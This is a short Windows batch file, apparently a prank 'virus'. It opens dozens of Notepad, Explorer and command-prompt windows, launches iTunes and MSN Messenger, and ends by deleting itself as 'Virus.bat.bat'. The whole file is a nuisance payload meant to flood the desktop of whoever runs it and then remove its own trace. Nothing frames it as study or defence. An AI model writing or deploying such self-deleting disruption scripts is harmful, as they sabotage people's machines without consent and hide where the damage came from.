echo on
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start notepad
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start explorer.exe
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start cmd
start Microsoft
start itunes.exe
start msnmsgr.exe
@DEL Virus.bat.bat